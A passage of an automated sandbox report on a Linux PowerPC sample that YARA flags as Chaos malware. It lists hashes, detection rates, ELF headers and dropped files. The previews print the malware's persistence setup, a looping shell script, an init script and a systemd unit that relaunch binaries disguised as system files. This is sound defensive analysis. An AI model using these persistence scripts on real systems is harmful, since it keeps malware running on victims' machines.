        • Rule: JoeSecurity_ChaosGo, Description: Yara detected Chaos, Source: /boot/System.img.config, Author: Joe Security
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 42%
        Reputation: low

        Process: /tmp/linux_ppc64el.elf
        File Type: POSIX shell script, ASCII text executable
        Category: dropped
        Size (bytes): 61
        Entropy (8bit): 4.483513158259707
        Encrypted: false
        SSDEEP: 3:TKH4vSNMOsUF4K0WJTDALWpgGAn:hisUF4kDALWRAn
        MD5: 768EAF287796DA19E1CF5E0B2FB1B161
        SHA1: 6A1CE2EE5CCC86D1F33806FEB14547B35290DF2A
        SHA-256: 1D22620DFB2A6715E5D745AED5CF841EDE0E75E1747F12B9B925A2D346BC7ECB
        SHA-512: E6AF30C9DF4F7F47696069511E64ECBC8E841629D692EE4056503DF3533FB7A7A74960698826260355E1DBA7B6C562482A27A39BB51A4237473CE4B68472D620
        Malicious: true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Joe Sandbox View:
        • Filename: linux_ppc64.elf, Detection: malicious
        • Filename: linux_ppc64el.elf, Detection: malicious
        • Filename: linux_386.elf, Detection: malicious
        • Filename: linux_arm5.elf, Detection: malicious
        • Filename: linux_arm6.elf, Detection: malicious
        • Filename: linux_arm64.elf, Detection: malicious
        • Filename: linux_amd64.elf, Detection: malicious
        • Filename: linux_arm7.elf, Detection: malicious
        • Filename: linux_arm6.elf, Detection: malicious
        • Filename: linux_arm5.elf, Detection: malicious
        Reputation: moderate, very likely benign file
        Preview: #!/bin/sh.while [ 1 ]; do.sleep 60./etc/id.services.conf.done

        Process: /tmp/linux_ppc64el.elf
        File Type: ELF 64-bit LSB executable, 64-bit PowerPC or cisco 7500, OpenPOWER ELF V2 ABI, version 1 (SYSV), statically linked, Go BuildID=Y52nvXRmmagZPlBTD-aN/NAr5Akn8HWwmUdYC_fAB/CpqR8sVX_ghDLQQPm5P-/GAtPsar0-LeUP45KvIBJ, stripped
        Category: dropped
        Size (bytes): 5111808
        Entropy (8bit): 5.971492382871872
        Encrypted: false
        SSDEEP: 49152:i2LzgioAq4P670Og/d6I+eFRgjpmbLQYLy28qntKyB1:nLzgioh4P670Og/d6I+wgjpaLya
        MD5: 04893430BFAF82B24E726E9980C338B3
        SHA1: 9DFD9C35B547705B267B4C2ACD5CB7699BA5EDB5
        SHA-256: 535B04D328DA7B0BE034710AEB74C4460C873D72CCF1E6E8186D4FAF2E158C60
        SHA-512: C20622C1339EDCBA1F4DF9F17876C460D42353DF319EA2CEB14C8467B8A5099E264173352A226FC4D41C9A4089FF831A36ACCABDC2E2C9A72847BAE06C2F9D0F
        Malicious: true
        Yara Hits:
        • Rule: JoeSecurity_ChaosGo, Description: Yara detected Chaos, Source: /etc/id.services.conf, Author: Joe Security
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 42%
        Reputation: low
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:POSIX shell script, ASCII text executable
                                                              Category:dropped
                                                              Size (bytes):189
                                                              Entropy (8bit):5.112939120919767
                                                              Encrypted:false
                                                              SSDEEP:3:TKH4vfSgisKhW0GNstXWQfvYqkNDH2MDGKLQsUkDJREpsVWRQ0kDJRKVtAKOW0T6:hnSgisKhdtXpvPkVLDqklv4Q0klaARB6
                                                              MD5:3909975F7CC0D1121C1819B800069F31
                                                              SHA1:3E68DE708C2E6C40FAB6794AFDEE3104E5590189
                                                              SHA-256:6876DAC71F13A068AFB863D257134275F2EDBA43B2ACAF4924FABF97C079070B
                                                              SHA-512:50600CCEEB03B05F45AE61D890CAEE9F51FF390B6776930866E527E071D65D08241FC66673FD9B99D62FBC77D3C00FC3DE4D7378CBC42F5DABA5D83072B0906E
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Reputation:moderate, very likely benign file
                                                              Preview:#!/bin/sh...### BEGIN INIT INFO...#chkconfig: 2345 10 90...#description:System.img.config...# Default-Start:.2 3 4 5...# Default-Stop:...### END INIT INFO.../boot/System.img.config...exit 0
                                                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):76
                                                              Entropy (8bit):3.7627880354948586
                                                              Encrypted:false
                                                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):207
                                                              Entropy (8bit):4.790870113084517
                                                              Encrypted:false
                                                              SSDEEP:6:z86XWRBADMD+ns7HrDC17HrDfsRs7HrDCLQmWA4Rn:znWR2D2+nsr4rfs6rCLHWrn
                                                              MD5:D80CCC7CED99538F22336F2EC0249087
                                                              SHA1:BE4DE9F604E065B53076A3D7BA702FE98C6B8746
                                                              SHA-256:0DC3E8552C3E6217E0DC7FD440C7BA4C9CD6E676CE2561E4F71949D2783AE968
                                                              SHA-512:D798E6516571FCD03BDFFBD5405F320FB23422CEB563901658EFA4101B4568EABC27730F40C0BCF6DDE5509F01BA6965DD61F64675DAD695924F1DEA1746E6DE
                                                              Malicious:false
                                                              Preview:[Unit].Description=linux.After=network.target.[Service].Type=forking.ExecStart=/boot/System.img.config.ExecReload=/boot/System.img.config.ExecStop=/boot/System.img.config.[Install].WantedBy=multi-user.target
                                                              Process:/usr/sbin/sshd
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):384
                                                              Entropy (8bit):0.8735982127940438
                                                              Encrypted:false
                                                              SSDEEP:3:V/aDLwbXWXVm/lX2/l:VWMbGI/Q/
                                                              MD5:9D70E6711CCDB75E9591CD6CCD456113
                                                              SHA1:8F2ABC19335C299FCCB3874B97AA33380BDB6A5F
                                                              SHA-256:E8EF7A0CD99AFB1D3C8FF88B1783C3C944A12B8C863C4734AD16DA0C2B63E16F
                                                              SHA-512:A1B9E5C5FE0C171B53D770CD4CE83F62E376541B58615F6F1A2BCA45C814E8E6E1C931051F1EC29338A226077EB02446D7331F9616A713EDF457FBCBEA2BA27E
                                                              Malicious:false
                                                              Preview:...._...ssh:notty...........................root............................192.168.2.23..............................................................................................................................................................................................................................................................Dg........................................
                                                              File type:ELF 64-bit LSB executable, 64-bit PowerPC or cisco 7500, OpenPOWER ELF V2 ABI, version 1 (SYSV), statically linked, Go BuildID=Y52nvXRmmagZPlBTD-aN/NAr5Akn8HWwmUdYC_fAB/CpqR8sVX_ghDLQQPm5P-/GAtPsar0-LeUP45KvIBJ, stripped
                                                              Entropy (8bit):5.971492382871872
                                                              TrID:
                                                              • ELF Executable and Linkable format (generic) (4004/1) 98.45%
                                                              • Lumena CEL bitmap (63/63) 1.55%
                                                              File name:linux_ppc64el.elf
                                                              File size:5'111'808 bytes
                                                              MD5:04893430bfaf82b24e726e9980c338b3
                                                              SHA1:9dfd9c35b547705b267b4c2acd5cb7699ba5edb5
                                                              SHA256:535b04d328da7b0be034710aeb74c4460c873d72ccf1e6e8186d4faf2e158c60
                                                              SHA512:c20622c1339edcba1f4df9f17876c460d42353df319ea2ceb14c8467b8a5099e264173352a226fc4d41c9a4089ff831a36accabdc2e2c9a72847bae06c2f9d0f
                                                              SSDEEP:49152:i2LzgioAq4P670Og/d6I+eFRgjpmbLQYLy28qntKyB1:nLzgioh4P670Og/d6I+wgjpaLya
                                                              TLSH:7E363942B7086FA9CA60493385B38ED117727D996F315343AB14FABEA8B63054F15FC8
                                                              File Content Preview:.ELF.....................R......@...................@.8...@.............@.......@.......@...............................................................d.......d...............................................T.%.....T.%.......................&.......'....

                                                              ELF header

                                                              Class:ELF64
                                                              Data:2's complement, little endian
                                                              Version:1 (current)
                                                              Machine:PowerPC64
                                                              Version Number:0x1
                                                              Type:EXEC (Executable file)
                                                              OS/ABI:UNIX - System V
                                                              ABI Version:0
                                                              Entry Point Address:0x75200
                                                              Flags:0x2
                                                              ELF Header Size:64
                                                              Program Header Offset:64
                                                              Program Header Size:56
                                                              Number of Program Headers:7
                                                              Section Header Offset:456
                                                              Section Header Size:64
                                                              Number of Section Headers:14
                                                              Header String Table Index:3
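                                                              Name             | Type     | Address  | Offset   | Size     | EntSize | Flags | Flags Description | Link | Info | Align
                                                                               | NULL     | 0x0      | 0x0      | 0x0      | 0x0     | 0x0   |                   | 0    | 0    | 0
                                                              .text            | PROGBITS | 0x11000  | 0x1000   | 0x25ba54 | 0x0     | 0x6   | AX                | 0    | 0    | 16
                                                              .rodata          | PROGBITS | 0x270000 | 0x260000 | 0xf402b  | 0x0     | 0x2   | A                 | 0    | 0    | 32
                                                              .shstrtab        | STRTAB   | 0x0      | 0x354040 | 0xa5     | 0x0     | 0x0   |                   | 0    | 0    | 1
                                                              .typelink        | PROGBITS | 0x364100 | 0x354100 | 0x17e0   | 0x0     | 0x2   | A                 | 0    | 0    | 32
                                                              .itablink        | PROGBITS | 0x3658e0 | 0x3558e0 | 0x950    | 0x0     | 0x2   | A                 | 0    | 0    | 32
                                                              .gosymtab        | PROGBITS | 0x366230 | 0x356230 | 0x0      | 0x0     | 0x2   | A                 | 0    | 0    | 1
                                                              .gopclntab       | PROGBITS | 0x366240 | 0x356240 | 0x149600 | 0x0     | 0x2   | A                 | 0    | 0    | 32
                                                              .go.buildinfo    | PROGBITS | 0x4b0000 | 0x4a0000 | 0xe0     | 0x0     | 0x3   | WA                | 0    | 0    | 16
                                                              .noptrdata       | PROGBITS | 0x4b00e0 | 0x4a00e0 | 0x310d8  | 0x0     | 0x3   | WA                | 0    | 0    | 32
                                                              .data            | PROGBITS | 0x4e11c0 | 0x4d11c0 | 0xb9f0   | 0x0     | 0x3   | WA                | 0    | 0    | 32
                                                              .bss             | NOBITS   | 0x4ecbc0 | 0x4dcbc0 | 0x381a0  | 0x0     | 0x3   | WA                | 0    | 0    | 32
                                                              .noptrbss        | NOBITS   | 0x524d60 | 0x514d60 | 0xf810   | 0x0     | 0x3   | WA                | 0    | 0    | 32
                                                              .note.go.buildid | NOTE     | 0x10f9c  | 0xf9c    | 0x64     | 0x0     | 0x2   | A                 | 0    | 0    | 4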
                                                              Type         | Offset   | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags  | Flags Description | Align   | Prog Interpreter | Section Mappings
                                                              PHDR         | 0x40     | 0x10040         | 0x10040          | 0x188     | 0x188       | 1.5012  | 0x4    | R                 | 0x10000 |                  |
                                                              NOTE         | 0xf9c    | 0x10f9c         | 0x10f9c          | 0x64      | 0x64        | 5.3074  | 0x4    | R                 | 0x4     |                  | .note.go.buildid
                                                              LOAD         | 0x0      | 0x10000         | 0x10000          | 0x25ca54  | 0x25ca54    | 6.1298  | 0x5    | R E               | 0x10000 |                  | .text .note.go.buildid
